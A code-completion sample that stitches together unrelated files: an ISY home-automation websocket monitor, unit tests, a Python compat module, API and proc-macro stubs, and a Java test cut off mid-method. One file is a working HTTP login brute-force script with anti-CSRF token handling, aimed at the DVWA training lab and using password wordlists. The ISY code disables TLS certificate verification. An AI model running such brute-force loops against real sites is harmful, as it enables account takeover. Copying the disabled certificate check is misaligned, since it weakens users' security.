<|file_name|>isyeventmonitor.py<|end_file_name|><|fim▁begin|>import base64
import errno
import random
import ssl
import threading
import time
import copy
import websocket
import xmltodict
import config
import debug
from utils import exitutils
import hubs.isy.isycodes as isycodes
import logsupport
from controlevents import CEvent, PostEvent, ConsoleEvent, PostIfInterested
from hubs.isy.isycodes import EVENT_CTRL, formatwsitem
from logsupport import ConsoleWarning, ConsoleError, ConsoleDetail, ConsoleDetailHigh
from utils.threadmanager import ThreadStartException
from utils.utilfuncs import safeprint
class ISYEMInternalError(Exception):
pass
def BaseAddr(addr):
return None if addr is None else ' '.join(addr.split(' ')[0:-1])
class ISYEventMonitor(object):
def __init__(self, thisISY):
self.connectionmode = 'try994' # trypolisy: trying without subp, polisy: connection worked, try994: trying with subp 994worked.
self.isy = thisISY
self.hubname = thisISY.name
self.QHnum = 1
self.a = base64.b64encode((self.isy.user + ':' + self.isy.password).encode('utf-8'))
self.watchstarttime = time.time()
self.watchlist = []
self.streamid = "unset"
self.seq = 0
self.lastheartbeat = 0
self.hbcount = 0
self.AlertNodes = {}
self.delayedstart = 0
self.longdown = 0
self.WS = None
self.THstate = 'init'
self.querycnt = 0
self.queryqueued = {}
self.LastMsgErr = ('***', -99)
self.isy.Busy = 0
self.lasterror = 'Init'
debug.debugPrint('DaemonCtl', "Queue Handler ", self.QHnum, " started: ", self.watchstarttime)
self.reportablecodes = ["DON", "DFON", "DOF", "DFOF", "ST", "CLISP", "CLISPH", "CLISPC", "CLIFS",
"CLIMD", "CLIHUM", "CLIHCS", "BRT", "DIM"] # "RR", "OL",
def EndWSServer(self):
self.lasterror = "DirectCommError"
self.WS.close()
def RealQuery(self, enode, seq, ndnm):
logsupport.Logs.Log("Queued query attempt (" + str(seq) + ") for: " + ndnm)
time.sleep(105 + random.randint(0, 30)) # allow any in progress query at ISY a chance to clear
if enode not in self.isy.ErrNodes:
logsupport.Logs.Log("Node error cleared without need of query (" + str(seq) + ") for: " + ndnm)
return
logsupport.Logs.Log(self.hubname + ": Attempt query (" + str(seq) + ") for errored node: " + ndnm,
severity=ConsoleWarning)
r = self.isy.try_ISY_comm('query/' + enode, timeout=60, closeonfail=False)
if r == '':
logsupport.Logs.Log(self.hubname + ": Query (" + str(seq) + ") attempt failed for node: " + ndnm,
severity=ConsoleWarning)
else:
time.sleep(2)
logsupport.Logs.Log(self.hubname + ": Query (" + str(seq) + ") attempt succeeded for node: " + ndnm)
if enode in self.isy.ErrNodes: del self.isy.ErrNodes[enode]
if enode in self.queryqueued: del self.queryqueued[enode]
def DoNodeQuery(self, enode, ndnm):
if enode not in self.queryqueued:
self.querycnt += 1
self.queryqueued[enode] = self.querycnt
t = threading.Thread(name='Query-' + str(self.querycnt) + '-' + enode, target=self.RealQuery, daemon=True,
args=(enode, self.querycnt, ndnm))
t.start()
else:
logsupport.Logs.Log(
self.hubname + ": Query " + str(self.queryqueued[enode]) + " already queued for node: " + ndnm)
def FakeNodeChange(self):
# noinspection PyArgumentList
PostEvent(ConsoleEvent(CEvent.HubNodeChange, hub=self.isy.name, node=None, value=-1))
def reinit(self):
self.watchstarttime = time.time()
self.watchlist = []
self.seq = 0
self.hbcount = 0
self.QHnum += 1
def PostStartQHThread(self):
if self.isy.version == -1:
# test mode
return
hungcount = 40
while self.THstate == 'restarting':
logsupport.Logs.Log(self.hubname + " Waiting thread start")
time.sleep(2)
hungcount -= 1
if hungcount < 0: raise ThreadStartException
while self.THstate == 'delaying':
time.sleep(1)
hungcount = 60
while self.THstate == 'starting':
logsupport.Logs.Log(self.hubname + ": Waiting initial status dump")
time.sleep(2)
hungcount -= 1
if hungcount < 0: raise ThreadStartException
if self.THstate == 'running':
self.isy._HubOnline = True
self.isy.Vars.CheckValsUpToDate(reload=True)
logsupport.Logs.Log(self.hubname + ": Initial status streamed ", self.seq, " items and vars updated")
elif self.THstate == 'failed':
logsupport.Logs.Log(self.hubname + " Failed Thread Restart", severity=ConsoleWarning)
else:
logsupport.Logs.Log(self.hubname + " Unknown ISY QH Thread state")
def PreRestartQHThread(self):
self.isy._HubOnline = False
self.THstate = 'restarting'
try:
if self.lasterror == 'ISYSocketTimeOut':
logsupport.Logs.Log(self.hubname + '(TimeoutError) Wait for likely router reboot or down',
severity=ConsoleWarning, tb=False)
self.delayedstart = 150
self.reinit()
return
if self.lasterror == 'ISYWSTimeOut':
logsupport.Logs.Log(self.hubname + ' WS restart after surprise close - short delay (15)',
severity=ConsoleWarning)
self.delayedstart = 15
elif self.lasterror == 'ISYNetDown':
# likely home network down so wait a bit
logsupport.Logs.Log(self.hubname + ' WS restart for NETUNREACH - delay likely router reboot or down',
severity=ConsoleWarning)
self.delayedstart = 121
elif self.lasterror == 'ISYClose':
logsupport.Logs.Log(self.hubname + ' Recovering closed WS stream')
self.delayedstart = 2
elif self.lasterror == 'DirectCommError':
logsupport.Logs.Log(self.hubname + ' WS restart because of failed direct communication failure')
self.delayedstart = 90 # probably ISY doing query
elif self.lasterror == 'ISYNoRoute':
logsupport.Logs.Log("{}: Hub probably down (semi) permanently ({})".self.name, self.longdown)
self.delayedstart = 3600 + self.longdown * 1800 # spread checks way out
self.isy._HubOnline = False
self.longdown += 1
else:
logsupport.Logs.Log(self.hubname + ' Unexpected error on WS stream: ', self.lasterror,
severity=ConsoleError, tb=False)
self.delayedstart = 90
except Exception as e:
logsupport.Logs.Log(self.hubname + ' PreRestartQH internal error ', e)
self.reinit()
def QHandler(self):
def on_error(qws, error):
self.isy.HBWS.Entry(repr(error))
self.lasterror = "ISYUnknown"
reconsev = ConsoleWarning if config.sysStore.ErrLogReconnects else logsupport.ConsoleInfo
if isinstance(error, websocket.WebSocketConnectionClosedException):
logsupport.Logs.Log(self.hubname + " WS connection closed - attempt to recontact ISY",
severity=reconsev)
self.lasterror = 'ISYClose'
elif isinstance(error, websocket.WebSocketTimeoutException):
logsupport.Logs.Log(self.hubname + " WS connection timed out", severity=ConsoleWarning)
self.lasterror = 'ISYWSTimeOut'
elif isinstance(error, TimeoutError):
logsupport.Logs.Log(self.hubname + " WS socket timed out", severity=ConsoleWarning)
self.lasterror = 'ISYSocketTimeOut'
elif isinstance(error, AttributeError):
logsupport.Logs.Log(self.hubname + " WS library bug", severity=ConsoleWarning)
self.lasterror = 'ISYClose'
elif isinstance(error, OSError):
if error.errno == errno.ENETUNREACH:
logsupport.Logs.Log(self.hubname + " WS network down", severity=ConsoleWarning)
self.lasterror = 'ISYNetDown'
else:
logsupport.Logs.Log(self.hubname + ' WS OS error', repr(error), severity=ConsoleError, tb=False)
self.lasterror = 'ISYNoRoute' # probably semi permanent failure
else:
if self.connectionmode == 'try994':
logsupport.Logs.Log("{}: Connection failed using 994 convention".format(self.hubname))
self.connectionmode = 'trypolisy'
elif self.connectionmode == 'trypolisy':
logsupport.Logs.Log("{}: Connection failed using Polisy convention".format(self.hubname))
self.connectionmode = 'try994'
else:
logsupport.Logs.Log(self.hubname + " Error in WS stream " + str(self.QHnum) + ': ' + repr(error),
severity=ConsoleError,
tb=True)
logsupport.Logs.Log(repr(websocket.WebSocketConnectionClosedException))
self.THstate = 'failed'
debug.debugPrint('DaemonCtl', "Websocket stream error", self.QHnum, repr(error))
qws.close()
# noinspection PyUnusedLocal
def on_close(qws, code, reason):
self.isy.HBWS.Entry("Close")
reconsev = ConsoleWarning if config.sysStore.ErrLogReconnects else logsupport.ConsoleInfo
logsupport.Logs.Log("{} WS stream {} closed: {}:{}".format(self.hubname, self.QHnum, code, reason),
severity=reconsev, hb=True)
debug.debugPrint('DaemonCtl', "ISY Websocket stream closed", str(code), str(reason))
def on_open(qws):
self.isy.HBWS.Entry("Open")
self.THstate = 'starting'
if self.connectionmode == 'try994':
self.connectionmode = '994worked'
logsupport.Logs.Log('{} connection worked using 994 convention'.format(self.isy.name))
elif self.connectionmode == 'trypolisy':
self.connectionmode = 'polisyworked'
logsupport.Logs.Log('{} connection worked using Polisy convention'.format(self.isy.name))
mess = '994' if self.connectionmode == '994worked' else 'Polisy' if self.connectionmode == 'polisyworked' else self.connectionmode
logsupport.Logs.Log("{}: WS stream {} opened ({})".format(self.hubname, self.QHnum, mess))
debug.debugPrint('DaemonCtl', "Websocket stream opened: ", self.QHnum, self.streamid)
self.WS = qws
# noinspection PyUnusedLocal,PyUnboundLocalVariable
def on_message(qws, message):
loopstart = time.time()
self.isy.HBWS.Entry('Message: {}'.format(repr(message)))
# print('Message: {}'.format(message))
try:
m = 'parse error'
m = xmltodict.parse(message)
msav = copy.deepcopy(m)
if debug.dbgStore.GetVal('ISYDump'):
debug.ISYDump("isystream.dmp", message, pretty=False)
# print(m)
if 'SubscriptionResponse' in m:
sr = m['SubscriptionResponse']
if self.streamid != sr['SID']:
self.streamid = sr['SID']
logsupport.Logs.Log("{}: Stream id: {}".format(self.hubname, self.streamid))
elif 'Event' in m:
E = m['Event']
esid = E.pop('@sid', 'No sid')
if self.streamid != esid:
logsupport.Logs.Log(
self.hubname + " Unexpected event stream change: " + self.streamid + "/" + str(esid),
severity=ConsoleError, tb=False)
exitutils.FatalError("WS Stream ID Changed")
eseq = int(E.pop('@seqnum', -99))
if self.seq != eseq:
logsupport.Logs.Log(
self.hubname + " Event mismatch - Expected: " + str(self.seq) + " Got: " + str(eseq),
severity=ConsoleWarning)
raise ISYEMInternalError
else:
self.seq += 1
ecode = E.pop('control', 'Missing control')
if ecode in EVENT_CTRL:
prcode = EVENT_CTRL[ecode]
else:
prcode = "**" + ecode + "**"
eaction = E.pop('action', 'No action')
enode = E.pop('node', 'No node')
eInfo = E.pop('eventInfo', 'No EventInfo')
if isinstance(eaction, dict):
debug.debugPrint('DaemonStream', "V5 stream - pull up action value: ", eaction)
eaction = eaction["#text"] # the new xmltodict will return as data['action']['#text']
if enode in self.isy.NodesByAddr: # get the node to set if any
N = self.isy.NodesByAddr[enode]
else:
N = None
<|fim▁hole|> if ecode == 'ST': # update cached state first before posting alerts or race
if isinstance(N, isycodes.ThermType):
N.cur = isycodes.NormalizeState(eaction)
elif N is not None:
oldstate = N.devState
N.devState = isycodes.NormalizeState(eaction)
logsupport.Logs.Log('ISYchg', 'ISY Node: ', N.name, ' state change from: ', oldstate,
' to: ', N.devState, severity=ConsoleDetailHigh)
if (oldstate == N.devState) and self.THstate == 'running':
logsupport.Logs.Log(self.hubname +
" State report with no change: " + N.name + ' state: ' + str(
oldstate))
else:
logsupport.Logs.Log(self.hubname +
" Status change for " + N.name + '(' + str(enode) + ') to ' + str(
N.devState), severity=ConsoleDetailHigh)
# status changed to post to any alerts that want it
# since alerts can only react to the state of a node we check only on an ST message
# screens on the other hand may need to know about other actions (thermostat e.g.)
# so they get checked below under reportablecodes
# if I check alerts there I get extra invocations for the DON and DOF e.g. which while not
# harmful are anomolous
if enode in self.AlertNodes:
# alert node changed
debug.debugPrint('DaemonCtl', 'ISY reports change(alert):',
self.isy.NodesByAddr[enode].name)
for a in self.AlertNodes[enode]:
if self.THstate != 'running':
# this is a restart or initial dump so indicate upwards to avoid misleading log entry
if a.state == 'Armed':
a.state = 'Init'
logsupport.Logs.Log(self.hubname + " Node alert fired: " + str(a),
severity=ConsoleDetail)
# noinspection PyArgumentList
PostEvent(ConsoleEvent(CEvent.ISYAlert, hub=self.isy.name, node=enode,
value=isycodes.NormalizeState(eaction), alert=a))
elif ecode == 'CLIHCS' and isinstance(N, isycodes.ThermType):
N.statecode = isycodes.NormalizeState(eaction)
elif ecode == 'CLIFS' and isinstance(N, isycodes.ThermType):
N.fancode = isycodes.NormalizeState(eaction)
elif ecode == 'CLIMD' and isinstance(N, isycodes.ThermType):
N.modecode = isycodes.NormalizeState(eaction)
elif ecode == 'CLIHUM' and isinstance(N, isycodes.ThermType):
N.hum = isycodes.NormalizeState(eaction)
elif ecode == 'CLISPH' and isinstance(N, isycodes.ThermType):
N.setlow = isycodes.NormalizeState(eaction)
elif ecode == 'CLISPC' and isinstance(N, isycodes.ThermType):
N.sethigh = isycodes.NormalizeState(eaction)
if ecode in self.reportablecodes:
# Node change report
debug.debugPrint('DaemonStream', time.time() - config.sysStore.ConsoleStartTime,
"Status update in stream: ",
eseq, ":",
prcode, " : ", enode, " : ", eInfo, " : ", eaction)
# logsupport.Logs.Log('reportable event '+str(ecode)+' for '+str(enode)+' action '+str(eaction))
PostIfInterested(self.isy, enode, isycodes.NormalizeState(eaction))
elif (prcode == 'Trigger') and (eaction == '6'):
vinfo = eInfo['var']
vartype = int(vinfo['@type'])
varid = int(vinfo['@id'])
varval = int(vinfo['val'])
debug.debugPrint('DaemonCtl', 'Var change: ', self.isy.Vars.GetNameFromAttr((vartype, varid)),
' set to ', varval)
debug.debugPrint('DaemonCtl', 'Var change:', ('Unkn', 'Integer', 'State')[vartype],
' variable ', varid,
' set to ', varval)
try:
self.isy.Vars.SetValByAttr((vartype, varid), varval, modifier=True)
except KeyError:
logsupport.Logs.Log(
"Unknown variable from " + self.hubname + " - probably added since startup",
severity=ConsoleWarning)
elif prcode == 'Heartbeat':
if self.hbcount > 0:
# wait 2 heartbeats
self.THstate = 'running'
self.lastheartbeat = time.time()
self.hbcount += 1
elif prcode == 'Billing':
self.THstate = 'running'
else:
pass # handle any other?
efmtact = E.pop('fmtAct', 'v4stream')
efmtnm = E.pop('fmtName', 'noName')
if E:
lev = ConsoleDetailHigh if str(
enode) in self.isy.V3Nodes else ConsoleWarning # supress to detail if it is a V3 node
logsupport.Logs.Log(
self.hubname + " Extra info in event: " + str(ecode) + '/' + str(prcode) + '/' + str(
eaction) + '/' + str(enode) + '/' + str(eInfo) + ' ' + str(E), severity=lev)
debug.debugPrint('DaemonStream', time.time() - config.sysStore.ConsoleStartTime,
formatwsitem(esid, eseq, ecode, eaction, enode, eInfo, E, self.isy))
try:
isynd = self.isy.NodesByAddr[enode].name
except (KeyError, AttributeError):
isynd = enode
if ecode == '_5':
now = time.time()
if str(eaction) == '1':
# logsupport.Logs.Log(self.hubname, ' went busy')
self.isy.Busy = now
elif str(eaction) == '0':
if self.isy.Busy != 0:
# logsupport.Logs.Log(self.hubname, " cleared busy")
if now - self.isy.Busy > 10:
logsupport.Logs.Log(
"{}: busy for {:.4f} seconds".format(self.hubname, now - self.isy.Busy))
self.isy.Busy = 0
else:
logsupport.Logs.Log(self.hubname, " reported stand-alone not busy")
else:
logsupport.Logs.Log(self.hubname, " reported System Status: ", str(eaction))
if ecode == "ST" or (ecode == "_3" and eaction == "CE"):
if self.LastMsgErr[0] != '***' and (
BaseAddr(self.LastMsgErr[0]) == BaseAddr(enode)):
# ERR msg followed by clearing - ISY weirdness?
logsupport.Logs.Log(
"{} reported and immediately cleared error for node: {} ({}) (seq:{}/{})".format(
self.hubname,
isynd, BaseAddr(self.LastMsgErr[0]), self.LastMsgErr[1], eseq),
severity=ConsoleWarning, hb=True)
self.LastMsgErr = ('***', -99)
elif enode in self.isy.ErrNodes:
logsupport.Logs.Log("{} cleared comm error for node: {}".format(self.hubname, isynd))
if enode in self.isy.ErrNodes:
# logsupport.Logs.Log("Query thread still running")
del self.isy.ErrNodes[enode]
if self.LastMsgErr != ('***', -99):
# previous message was ERR and wasn't immediately cleared
try:
isyerrnd = self.isy.NodesByAddr[self.LastMsgErr[0]].name
except (KeyError, AttributeError):
isyerrnd = self.LastMsgErr[0]
logsupport.Logs.Log(
"{} WS stream shows comm error for node: {}(Seq:{})".format(self.hubname, isyerrnd,
self.LastMsgErr[1]),
severity=ConsoleWarning, hb=True)
if self.LastMsgErr[0] not in self.isy.ErrNodes:
self.isy.ErrNodes[self.LastMsgErr[0]] = eseq
self.DoNodeQuery(self.LastMsgErr[0], isyerrnd)
self.LastMsgErr = ('***', -99)
if ecode == "ERR":
if str(eaction) == "0":
pass
# logsupport.Logs.Log("ERR(0) seen: {}".format(repr(m)))
else:
# Note the error and wait one message to see if it immediately clears
self.LastMsgErr = (enode, eseq)
logsupport.Logs.Log("ERR(1) seen: {}".format(repr(xmltodict.parse(message))),
severity=ConsoleWarning)
if ecode == "_3" and eaction == "NE":
self.LastMsgErr = (enode, eseq)
logsupport.Logs.Log(
"{} WS stream reported NE error code on WS stream for node{}(Seq:{})".format(self.hubname,
isynd, eseq),
hb=True)
else:
logsupport.Logs.Log(self.hubname + " Strange item in event stream: " + str(m),
severity=ConsoleWarning)
safeprint(message)
except Exception as E:
logsupport.Logs.Log(self.hubname + " Exception in QH on message: ", repr(msav), ' Excp: ', repr(E),
severity=ConsoleWarning)
loopend = time.time()
self.isy.HBWS.Entry('Processing time: {} Done: {}'.format(loopend - loopstart, repr(
message)))
time.sleep(.001) # force thread to give up processor to allow response to time events
if self.isy.version == -1:
self.isy._HubOnline = True
time.sleep(7)
with open('/home/pi/Console/isystream.dmp', 'r') as f:
mes = f.readline() # absorb first
# safeprint("Message1: {}".format(mes))
while True:
mes = f.readline().rstrip('\n')
if mes == '':
# safeprint('Done')
break
# safeprint("Message: {}".format(mes))
on_message(None, mes)
time.sleep(.4)
while True:
time.sleep(500)
return
self.THstate = 'delaying'
logsupport.Logs.Log("{}: WS stream thread {} setup".format(self.hubname, self.QHnum), severity=ConsoleDetail)
if self.delayedstart != 0:
logsupport.Logs.Log(self.hubname + " Delaying Hub restart for probable network reset: ",
str(self.delayedstart), ' seconds')
time.sleep(self.delayedstart)
# websocket.enableTrace(True)
websocket.setdefaulttimeout(30)
if self.isy.addr.startswith('http://'):
wsurl = 'ws://' + self.isy.addr[7:] + '/rest/subscribe'
elif self.isy.addr.startswith('https://'):
wsurl = 'wss://' + self.isy.addr[8:] + '/rest/subscribe'
else:
wsurl = 'ws://' + self.isy.addr + '/rest/subscribe'
import logging
WStrace = open('/home/pi/WStrace', 'w')
print('Open {}'.format(wsurl), file=WStrace)
websocket.enableTrace(True, handler=logging.StreamHandler(stream=WStrace))
while True:
try:
# noinspection PyArgumentList
if self.connectionmode in ('trypolisy', 'polisyworked'):
ws = websocket.WebSocketApp(wsurl, on_message=on_message,
on_error=on_error,
on_close=on_close, on_open=on_open,
header={'Authorization': 'Basic ' + self.a.decode('ascii')})
else:
ws = websocket.WebSocketApp(wsurl, on_message=on_message,
on_error=on_error,
subprotocols=['ISYSUB'],
on_close=on_close, on_open=on_open,
header={'Authorization': 'Basic ' + self.a.decode('ascii')})
break
except AttributeError as e:
logsupport.Logs.Log(self.hubname + " Problem starting WS handler - retrying: ", repr(e))
self.lastheartbeat = time.time()
ws.run_forever(ping_timeout=999, sslopt={"cert_reqs": ssl.CERT_NONE})
self.THstate = 'failed'
self.isy._HubOnline = False
sev = ConsoleWarning if config.sysStore.ErrLogReconnects else logsupport.ConsoleInfo
logsupport.Logs.Log(self.hubname + " QH Thread " + str(self.QHnum) + " exiting", severity=sev,
tb=False)<|fim▁end|> | |
<|file_name|>test_szig.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2.7
############################################################################
##
## Copyright (c) 2000-2015 BalaBit IT Ltd, Budapest, Hungary
## Copyright (c) 2015-2018 BalaSys IT Ltd, Budapest, Hungary
##
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program; if not, write to the Free Software Foundation, Inc.,
## 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##
############################################################################
import unittest
from HandlerMock import HandlerMock
from zorpctl.szig import SZIG
<|fim▁hole|>
class TestSzig(unittest.TestCase):
def setUp(self):
self.szig = SZIG("", HandlerMock)
def test_get_value(self):
self.assertEquals(self.szig.get_value(""), None)
self.assertEquals(self.szig.get_value("service"), None)
self.assertEquals(self.szig.get_value("info.policy.file"), "/etc/zorp/policy.py")
self.assertEquals(self.szig.get_value("stats.thread_number"), 5)
self.assertEquals(self.szig.get_value("service.service_http_transparent.sessions_running"), 0)
def test_get_sibling(self):
self.assertEquals(self.szig.get_sibling("conns"), "info")
self.assertEquals(self.szig.get_sibling("stats.threads_running"), "stats.thread_rate_max")
self.assertEquals(self.szig.get_sibling("stats.thread_rate_max"), "stats.audit_number")
self.assertEquals(self.szig.get_sibling("stats.thread_number"), None)
def test_get_child(self):
self.assertEquals(self.szig.get_child(""), "conns")
self.assertEquals(self.szig.get_child("info"), "info.policy")
self.assertEquals(self.szig.get_child("info.policy"), "info.policy.reload_stamp")
self.assertEquals(self.szig.get_child("info.policy.reload_stamp"), None)
def test_get_set_loglevel(self):
loglevel = 6
self.szig.loglevel = loglevel
self.assertEquals(self.szig.loglevel, loglevel)
def test_get_set_logspec(self):
logspec = "this is a logspec"
self.szig.logspec = logspec
self.assertEquals(self.szig.logspec, logspec)
def test_get_set_deadlockcheck(self):
deadlockcheck = False
self.szig.deadlockcheck = deadlockcheck
self.assertEquals(self.szig.deadlockcheck, deadlockcheck)
def test_reload_and_reload_result(self):
self.szig.reload()
self.assertEquals(self.szig.reload_result(), True)
def test_coredump(self):
try:
self.szig.coredump()
self.assertTrue(False, "szig coredump should not work while not repaired")
except:
self.assertTrue(True, "szig coredump is not working yet")
if __name__ == '__main__':
unittest.main()<|fim▁end|> | |
<|file_name|>compat.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
wakatime.compat
~~~~~~~~~~~~~~~
For working with Python2 and Python3.
:copyright: (c) 2014 Alan Hamlett.
:license: BSD, see LICENSE for more details.
"""
import codecs
import os
import platform
import subprocess
import sys
is_py2 = (sys.version_info[0] == 2)
is_py3 = (sys.version_info[0] == 3)
is_win = platform.system() == 'Windows'
if is_py2: # pragma: nocover
def u(text):
if text is None:
return None
try:
return text.decode('utf-8')
except:
try:
return text.decode(sys.getdefaultencoding())
except:
try:
return unicode(text)
except:
return text.decode('utf-8', 'replace')
open = codecs.open
basestring = basestring
elif is_py3: # pragma: nocover
def u(text):
if text is None:
return None
if isinstance(text, bytes):
try:
return text.decode('utf-8')
except:
try:
return text.decode(sys.getdefaultencoding())<|fim▁hole|> try:
return str(text)
except:
return text.decode('utf-8', 'replace')
open = open
basestring = (str, bytes)
try:
from importlib import import_module
except ImportError: # pragma: nocover
def _resolve_name(name, package, level):
"""Return the absolute name of the module to be imported."""
if not hasattr(package, 'rindex'):
raise ValueError("'package' not set to a string")
dot = len(package)
for x in xrange(level, 1, -1):
try:
dot = package.rindex('.', 0, dot)
except ValueError:
raise ValueError("attempted relative import beyond top-level "
"package")
return "%s.%s" % (package[:dot], name)
def import_module(name, package=None):
"""Import a module.
The 'package' argument is required when performing a relative import.
It specifies the package to use as the anchor point from which to
resolve the relative import to an absolute import.
"""
if name.startswith('.'):
if not package:
raise TypeError("relative imports require the 'package' "
"argument")
level = 0
for character in name:
if character != '.':
break
level += 1
name = _resolve_name(name[level:], package, level)
__import__(name)
return sys.modules[name]
try:
from .packages import simplejson as json
except (ImportError, SyntaxError): # pragma: nocover
import json
class Popen(subprocess.Popen):
"""Patched Popen to prevent opening cmd window on Windows platform."""
def __init__(self, *args, **kwargs):
startupinfo = kwargs.get('startupinfo')
if is_win or True:
try:
startupinfo = startupinfo or subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
except AttributeError:
pass
kwargs['startupinfo'] = startupinfo
if 'env' not in kwargs:
kwargs['env'] = os.environ.copy()
kwargs['env']['LANG'] = 'en-US' if is_win else 'en_US.UTF-8'
subprocess.Popen.__init__(self, *args, **kwargs)<|fim▁end|> | except:
pass |
<|file_name|>dvwa-login-bruteforce-http-post-csrf.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# Quick PoC template for HTTP POST form brute force, with anti-CRSF token
# Target: DVWA v1.10
# Date: 2015-10-19
# Author: g0tmi1k ~ https://blog.g0tmi1k.com/
# Source: https://blog.g0tmi1k.com/2015/10/dvwa-login/
import requests
import sys
import re
from BeautifulSoup import BeautifulSoup
# Variables
target = 'http://192.168.1.33/DVWA'
user_list = '/usr/share/seclists/Usernames/top_shortlist.txt'
pass_list = '/usr/share/seclists/Passwords/rockyou.txt'
# Value to look for in response header (Whitelisting)
success = 'index.php'
# Get the anti-CSRF token
def csrf_token():
try:
# Make the request to the URL
print "\n[i] URL: %s/login.php" % target
r = requests.get("{0}/login.php".format(target), allow_redirects=False)
except:
# Feedback for the user (there was an error) & Stop execution of our request
print "\n[!] csrf_token: Failed to connect (URL: %s/login.php).\n[i] Quitting." % (target)
sys.exit(-1)
# Extract anti-CSRF token
soup = BeautifulSoup(r.text)
user_token = soup("input", {"name": "user_token"})[0]["value"]
print "[i] user_token: %s" % user_token
<|fim▁hole|>
return session_id, user_token
# Make the request to-do the brute force
def url_request(username, password, session_id, user_token):
# POST data
data = {
"username": username,
"password": password,
"user_token": user_token,
"Login": "Login"
}
# Cookie data
cookie = {
"PHPSESSID": session_id
}
try:
# Make the request to the URL
#print "\n[i] URL: %s/vulnerabilities/brute/" % target
#print "[i] Data: %s" % data
#print "[i] Cookie: %s" % cookie
r = requests.post("{0}/login.php".format(target), data=data, cookies=cookie, allow_redirects=False)
except:
# Feedback for the user (there was an error) & Stop execution of our request
print "\n\n[!] url_request: Failed to connect (URL: %s/vulnerabilities/brute/).\n[i] Quitting." % (target)
sys.exit(-1)
# Wasn't it a redirect?
if r.status_code != 301 and r.status_code != 302:
# Feedback for the user (there was an error again) & Stop execution of our request
print "\n\n[!] url_request: Page didn't response correctly (Response: %s).\n[i] Quitting." % (r.status_code)
sys.exit(-1)
# We have what we need
return r.headers["Location"]
# Main brute force loop
def brute_force(user_token, session_id):
# Load in wordlists files
with open(pass_list) as password:
password = password.readlines()
with open(user_list) as username:
username = username.readlines()
# Counter
i = 0
# Loop around
for PASS in password:
for USER in username:
USER = USER.rstrip('\n')
PASS = PASS.rstrip('\n')
# Increase counter
i += 1
# Feedback for the user
print ("[i] Try %s: %s // %s" % (i, USER, PASS))
# Fresh CSRF token each time?
#user_token, session_id = csrf_token()
# Make request
attempt = url_request(USER, PASS, session_id, user_token)
#print attempt
# Check response
if attempt == success:
print ("\n\n[i] Found!")
print "[i] Username: %s" % (USER)
print "[i] Password: %s" % (PASS)
return True
return False
# Get initial CSRF token
session_id, user_token = csrf_token()
# Start brute forcing
brute_force(user_token, session_id)<|fim▁end|> | # Extract session information
session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"])
session_id = session_id.group(1)
print "[i] session_id: %s\n" % session_id |
<|file_name|>task_index.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
from changes.api.base import APIView
from changes.models import Task
class TaskIndexAPIView(APIView):
def get(self):
queryset = Task.query.order_by(Task.date_created.desc())
<|fim▁hole|><|fim▁end|> | return self.paginate(queryset) |
<|file_name|>macro-brackets.rs<|end_file_name|><|fim▁begin|>// Copyright 2018 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// force-host
// no-prefer-dynamic<|fim▁hole|>#![crate_type = "proc-macro"]
extern crate proc_macro;
use proc_macro::*;
#[proc_macro_attribute]
pub fn doit(_: TokenStream, input: TokenStream) -> TokenStream {
input.into_iter().collect()
}<|fim▁end|> | |
<|file_name|>D0002FuncTest.java<|end_file_name|><|fim▁begin|>package top.cardone.func.vx.usercenter.userDepartment;
import com.google.common.base.Charsets;
import lombok.extern.log4j.Log4j2;
import lombok.val;
import org.apache.commons.io.FileUtils;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.boot.test.context.SpringBootTest;
import org.springframework.core.io.Resource;
import org.springframework.http.HttpEntity;
import org.springframework.http.HttpHeaders;
import org.springframework.http.MediaType;
import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;
import org.springframework.util.StopWatch;
import top.cardone.ConsumerApplication;
import top.cardone.context.ApplicationContextHolder;
import java.io.IOException;
@Log4j2
@RunWith(SpringJUnit4ClassRunner.class)
@SpringBootTest(classes = ConsumerApplication.class, value = {"spring.profiles.active=test"}, webEnvironment = SpringBootTest.WebEnvironment.DEFINED_PORT)
public class D0002FuncTest {<|fim▁hole|> @Value("file:src/test/resources/top/cardone/func/vx/usercenter/userDepartment/D0002FuncTest.func.input.json")
private Resource funcInputResource;
@Value("file:src/test/resources/top/cardone/func/vx/usercenter/userDepartment/D0002FuncTest.func.output.json")
private Resource funcOutputResource;
private HttpEntity<String> httpEntity;
private int pressure = 10000;
@Before
public void setup() throws Exception {
HttpHeaders headers = new HttpHeaders();
headers.setContentType(MediaType.APPLICATION_JSON_UTF8);
headers.set("Accept", MediaType.APPLICATION_JSON_UTF8_VALUE);
headers.set("token", ApplicationContextHolder.getBean(org.apache.shiro.authc.credential.PasswordService.class).encryptPassword("admin"));
headers.set("username", "admin");
if (!funcInputResource.exists()) {
FileUtils.write(funcInputResource.getFile(), "{}", Charsets.UTF_8);
}
String input = FileUtils.readFileToString(funcInputResource.getFile(), Charsets.UTF_8);
httpEntity = new HttpEntity<>(input, headers);
}
@Test
public void func() throws RuntimeException {
String output = new org.springframework.boot.test.web.client.TestRestTemplate().postForObject(funcUrl, httpEntity, String.class);
try {
FileUtils.write(funcOutputResource.getFile(), output, Charsets.UTF_8);
} catch (IOException e) {
throw new RuntimeException(e);
}
}
@Test
public void pressureFunc() throws Exception {
for (int i = 0; i < pressure; i++) {
val sw = new StopWatch();
sw.start(funcUrl);
